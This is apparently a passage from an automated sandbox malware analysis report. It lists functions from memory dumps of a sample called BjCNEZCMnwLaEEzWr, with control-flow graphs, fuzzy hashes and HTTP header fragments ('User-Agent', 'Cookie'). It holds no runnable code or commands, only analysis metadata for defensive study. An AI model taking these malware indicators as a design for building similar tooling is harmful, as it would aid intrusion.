                                                                                                                                                                • Source File: 00000028.00000002.2914978673.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_40_2_8b0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                • Instruction ID: 22bb2547e1417a25f0d702569d004b5f781c736981ba61bd9986a772d00aed1d
                                                                                                                                                                • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                • Instruction Fuzzy Hash: E1F08270988640E7EF413BB48C4B6A93AB4FF00705F040190BA49ED3D2CE3056509E76
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 008B4675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 136 8b4675-8b468d call 8b3a1c 139 8b468f-8b4698 call 8b3a6e 136->139 140 8b469d-8b46cd 136->140 139->140 143 8b46d3-8b46f5 140->143 144 8b47e7-8b47ec 140->144 143->144 146 8b46fb-8b4720 143->146 148 8b4738-8b475a 146->148 149 8b4722-8b4737 146->149 151 8b47bf-8b47c9 148->151 152 8b475c-8b477e 148->152 149->148 153 8b47cb-8b47dd call 8b3673 151->153 154 8b47e0-8b47e5 151->154 152->151 158 8b4780-8b47a2 152->158 153->154 154->144 158->151 160 8b47a4-8b47bc 158->160 160->151
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000028.00000002.2914978673.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_40_2_8b0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction ID: 10dabc0086b742d36991aebe5a0e4bc54c0b2b033fa7c7c926e660388da107de
                                                                                                                                                                • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction Fuzzy Hash: BD4181B6600608BFEF125F65CC48BEEBFB9FF80704F154069EA44EA255DB309A44CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 008B4674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 111 8b4674-8b4680 112 8b468b-8b468d 111->112 113 8b4686 call 8b3a1c 111->113 114 8b468f-8b4698 call 8b3a6e 112->114 115 8b469d-8b46cd 112->115 113->112 114->115 118 8b46d3-8b46f5 115->118 119 8b47e7-8b47ec 115->119 118->119 121 8b46fb-8b4720 118->121 123 8b4738-8b475a 121->123 124 8b4722-8b4737 121->124 126 8b47bf-8b47c9 123->126 127 8b475c-8b477e 123->127 124->123 128 8b47cb-8b47dd call 8b3673 126->128 129 8b47e0-8b47e5 126->129 127->126 133 8b4780-8b47a2 127->133 128->129 129->119 133->126 135 8b47a4-8b47bc 133->135 135->126
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000028.00000002.2914978673.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_40_2_8b0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction ID: 82efd7b73b9b4bc61e2ce57c5cb368d0ec56d42def0a996e4312fb273a90e693
                                                                                                                                                                • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction Fuzzy Hash: CA4163B6500608BFEF129F65CC44BEEBFB9FF84704F154059EA44EA255DB309A44CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00B5093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 b5093e-b5095f call b50cc4 call b514bc call b53cc0 8 b50967-b50989 0->8 10 b50af1-b50af2 8->10 11 b5098f-b509d2 call b509d9 8->11 15 b509d4-b509d5 11->15 16 b50a3d-b50a76 11->16 18 b509d7-b509e8 call b53653 15->18 19 b50a3c 15->19 17 b50a7e-b50a80 16->17 21 b50a82-b50aae 17->21 22 b50aec call b50af3 17->22 18->22 30 b509ee-b50a10 18->30 19->16 21->22 27 b50ab0-b50abc 21->27 22->10 31 b50ac1-b50ae5 27->31 30->22 34 b50a16-b50a3b 30->34 31->10 37 b50ae7-b50aea 31->37 34->22 38 b50a41-b50a76 34->38 37->22 37->31 38->17
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000029.00000002.2918966978.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_41_2_b50000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction ID: 05560e18a046293cdd9cee99888cfc54633264ae3799d73c3e62e7a93d072922
                                                                                                                                                                • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction Fuzzy Hash: 0A5191315443549FEF226F20CC85B9977F8EF04745F0801D9BE45FE0D6DAB09A94CA65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B514BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 39 b514bc-b514df call b514de 42 b514e1-b51500 call b50c9c 39->42 43 b51502-b51590 call b51345 * 6 39->43 42->43
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000029.00000002.2918966978.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_41_2_b50000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: fc032be1761e2e27ec16aa6f47ae36ec6219fc5cd5c4500d68a6f7b1eca660e1
                                                                                                                                                                • Instruction ID: 095adf223c21b9357d28cfe1333bffdb67ee217c872dc1fc7d6dec891200ad48
                                                                                                                                                                • Opcode Fuzzy Hash: fc032be1761e2e27ec16aa6f47ae36ec6219fc5cd5c4500d68a6f7b1eca660e1
                                                                                                                                                                • Instruction Fuzzy Hash: E7210372404614AEDB03BF60C9C9EA673ECEF40705F4509EAAD85EF049FAB09158CAE5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B51345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 59 b51345-b51352 60 b51358-b5135e 59->60 61 b513eb-b513ec 59->61 60->61 62 b51364-b5137a 60->62 62->61 64 b5137c-b5138f 62->64 66 b51391-b51398 64->66 67 b5139b-b513ab call b50e7c 66->67 70 b513ad-b513e2 67->70 70->61
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000029.00000002.2918966978.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_41_2_b50000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction ID: 250b6efdbeabafb02b7699acfcdc70c0b1cca8efe4ea4f08b1870a91deddb27c
                                                                                                                                                                • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction Fuzzy Hash: 2821AE31904216AFDB11DF78C885B5DBBF5AF08301F054295FD55BB594D770A804CB98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B514DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 71 b514de-b51590 call b53653 call b50c9c call b51345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000029.00000002.2918966978.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_41_2_b50000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
                                                                                                                                                                • Instruction ID: 2acb1f6591c648b665f226d1fd946c4c1a5a16dfac9474d137f4cdbd4b3397d6
                                                                                                                                                                • Opcode Fuzzy Hash: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
                                                                                                                                                                • Instruction Fuzzy Hash: 1711BF72404514AEEF03BF60C5C9DAA73ECEE40705B4509EAAD85EF44AFFB09158CAE5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B53F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 90 b53f0d-b53f29 call b53653 call b5379f 95 b53f3b-b53f66 call b53f78 * 3 90->95 96 b53f2b-b53f39 call b5401b 90->96 109 b53f71 95->109 103 b53f76-b53f77 96->103 109->103 110 b53f71 call b53f78 109->110 110->103
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000029.00000002.2918966978.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_41_2_b50000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
                                                                                                                                                                • Instruction ID: 417b22bac520854fff9ff1abcc422e05309419c94b671c9c922ecec91938a8fe
                                                                                                                                                                • Opcode Fuzzy Hash: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
                                                                                                                                                                • Instruction Fuzzy Hash: FDF01270D88340A6EF413BB09C4B75D36F49F40B87F0405D1BE49AD1D6DEB056589E75
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 00B54675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 136 b54675-b5468d call b53a1c 139 b5469d-b546cd 136->139 140 b5468f-b54698 call b53a6e 136->140 143 b547e7-b547ec 139->143 144 b546d3-b546f5 139->144 140->139 144->143 146 b546fb-b54720 144->146 148 b54722-b54737 146->148 149 b54738-b5475a 146->149 148->149 151 b5475c-b5477e 149->151 152 b547bf-b547c9 149->152 151->152 158 b54780-b547a2 151->158 153 b547e0-b547e5 152->153 154 b547cb-b547dd call b53673 152->154 153->143 154->153 158->152 160 b547a4-b547bc 158->160 160->152
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000029.00000002.2918966978.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_41_2_b50000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction ID: 38ecaadd12c3313dec0188656f6bec9c7165f8e60a9be1021cc69fd14acc106c
                                                                                                                                                                • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction Fuzzy Hash: D441A4B6500208BFEF125F65CC48BDEBFF9EF84704F154099EA44AA254D770DA94CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B54674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 111 b54674-b54680 112 b5468b-b5468d 111->112 113 b54686 call b53a1c 111->113 114 b5469d-b546cd 112->114 115 b5468f-b54698 call b53a6e 112->115 113->112 118 b547e7-b547ec 114->118 119 b546d3-b546f5 114->119 115->114 119->118 121 b546fb-b54720 119->121 123 b54722-b54737 121->123 124 b54738-b5475a 121->124 123->124 126 b5475c-b5477e 124->126 127 b547bf-b547c9 124->127 126->127 133 b54780-b547a2 126->133 128 b547e0-b547e5 127->128 129 b547cb-b547dd call b53673 127->129 128->118 129->128 133->127 135 b547a4-b547bc 133->135 135->127
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000029.00000002.2918966978.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_41_2_b50000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction ID: 7802c7558289ca189bcb444ea61648bdbfb76ada864200e22cb9c0802df94950
                                                                                                                                                                • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction Fuzzy Hash: 5F4193B6500208BFEF129FA4CC44BEEBFF9EF84704F154099EA44AA254D7709A84CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 02EB093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 2eb093e-2eb095f call 2eb0cc4 call 2eb14bc call 2eb3cc0 8 2eb0967-2eb0989 0->8 10 2eb098f-2eb09d2 call 2eb09d9 8->10 11 2eb0af1-2eb0af2 8->11 15 2eb0a3d-2eb0a76 10->15 16 2eb09d4-2eb09d5 10->16 17 2eb0a7e-2eb0a80 15->17 18 2eb0a3c 16->18 19 2eb09d7-2eb09e8 call 2eb3653 16->19 20 2eb0aec call 2eb0af3 17->20 21 2eb0a82-2eb0aae 17->21 18->15 19->20 30 2eb09ee-2eb0a10 19->30 20->11 21->20 27 2eb0ab0-2eb0abc 21->27 31 2eb0ac1-2eb0ae5 27->31 30->20 34 2eb0a16-2eb0a3b 30->34 31->11 37 2eb0ae7-2eb0aea 31->37 34->20 38 2eb0a41-2eb0a76 34->38 37->20 37->31 38->17
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002A.00000002.2927163843.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_42_2_2eb0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction ID: c2ee671aa327fb6d2753e5393e31d08fa6376d2dd44720bdc6f6d466afb9d340
                                                                                                                                                                • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction Fuzzy Hash: FE51B0311842549FEF239F20CC85BEB3BB8AF05744F040599BA49FE0D6DBB0A590CA65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02EB14BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 39 2eb14bc-2eb1590 call 2eb14de call 2eb0c9c call 2eb1345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002A.00000002.2927163843.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_42_2_2eb0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                • Instruction ID: 7279ac5924f600a8290fb80157424e7d38a9b508ca0b7cd7cb3005aa9d22c535
                                                                                                                                                                • Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                • Instruction Fuzzy Hash: B721FA724046149EDF03AF60C9C88E773ECEF40704F45496AA989EF049FA709554CEE6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02EB1345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 58 2eb1345-2eb1352 59 2eb13eb-2eb13ec 58->59 60 2eb1358-2eb135e 58->60 60->59 61 2eb1364-2eb137a 60->61 61->59 63 2eb137c-2eb138f 61->63 65 2eb1391-2eb1398 63->65 66 2eb139b-2eb13ab call 2eb0e7c 65->66 69 2eb13ad-2eb13e2 66->69 69->59
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002A.00000002.2927163843.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_42_2_2eb0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction ID: 6e1dd539d5b8ba6a9d1a466c50e34a4514fef2ac308abd30f8c9cde112378757
                                                                                                                                                                • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction Fuzzy Hash: 6321C031944216AFDF129F78D844B9EBBB5AF04314F058215FD59BF594D730E800CBA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02EB14DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 70 2eb14de-2eb1590 call 2eb3653 call 2eb0c9c call 2eb1345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002A.00000002.2927163843.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_42_2_2eb0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                • Instruction ID: d4b2e24409008a2caa406e5bf1555a4e80b04fa7f2c01a71e509cb224d1fb62e
                                                                                                                                                                • Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                • Instruction Fuzzy Hash: DE1174724046149EEF03AF60C5C88EB73ECEE40708B4659AAAD89EF459FE709154CEE5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02EB3F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 88 2eb3f0d-2eb3f29 call 2eb3653 call 2eb379f 93 2eb3f3b-2eb3f66 call 2eb3f78 * 3 88->93 94 2eb3f2b-2eb3f39 call 2eb401b 88->94 107 2eb3f71 93->107 102 2eb3f76-2eb3f77 94->102 107->102 108 2eb3f71 call 2eb3f78 107->108 108->102
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002A.00000002.2927163843.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_42_2_2eb0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                • Instruction ID: 6c91dd185fa38f9807c5f836e0286e778a149f34da3cce1e748cea74dd893dc5
                                                                                                                                                                • Opcode Fuzzy Hash: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                • Instruction Fuzzy Hash: 38F08C705C8240EAEF033BB18C4F6CB33B9AF00705F04A1D0BA89AD0D4CE3095508E71
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 02EB4675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 134 2eb4675-2eb468d call 2eb3a1c 137 2eb468f-2eb4698 call 2eb3a6e 134->137 138 2eb469d-2eb46cd 134->138 137->138 141 2eb46d3-2eb46f5 138->141 142 2eb47e7-2eb47ec 138->142 141->142 144 2eb46fb-2eb4720 141->144 146 2eb4738-2eb475a 144->146 147 2eb4722-2eb4737 144->147 149 2eb47bf-2eb47c9 146->149 150 2eb475c-2eb477e 146->150 147->146 151 2eb47cb-2eb47dd call 2eb3673 149->151 152 2eb47e0-2eb47e5 149->152 150->149 156 2eb4780-2eb47a2 150->156 151->152 152->142 156->149 158 2eb47a4-2eb47bc 156->158 158->149
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002A.00000002.2927163843.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_42_2_2eb0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction ID: 92e1d72827fd8e23f92ca086b13215db22f4d29fb33ce502f8fc9f9e1bd7525e
                                                                                                                                                                • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction Fuzzy Hash: BD4185B6500218BFEF125F65CC48BDEBFBAEF84708F154069EA44AA295D730D650CF94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02EB4674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 109 2eb4674-2eb4680 110 2eb468b-2eb468d 109->110 111 2eb4686 call 2eb3a1c 109->111 112 2eb468f-2eb4698 call 2eb3a6e 110->112 113 2eb469d-2eb46cd 110->113 111->110 112->113 116 2eb46d3-2eb46f5 113->116 117 2eb47e7-2eb47ec 113->117 116->117 119 2eb46fb-2eb4720 116->119 121 2eb4738-2eb475a 119->121 122 2eb4722-2eb4737 119->122 124 2eb47bf-2eb47c9 121->124 125 2eb475c-2eb477e 121->125 122->121 126 2eb47cb-2eb47dd call 2eb3673 124->126 127 2eb47e0-2eb47e5 124->127 125->124 131 2eb4780-2eb47a2 125->131 126->127 127->117 131->124 133 2eb47a4-2eb47bc 131->133 133->124
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002A.00000002.2927163843.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_42_2_2eb0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction ID: 80bf934447bd81371c181131f6ddb17b7d8d0f8ff7a2cadc8ba3f9d96be2ae56
                                                                                                                                                                • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
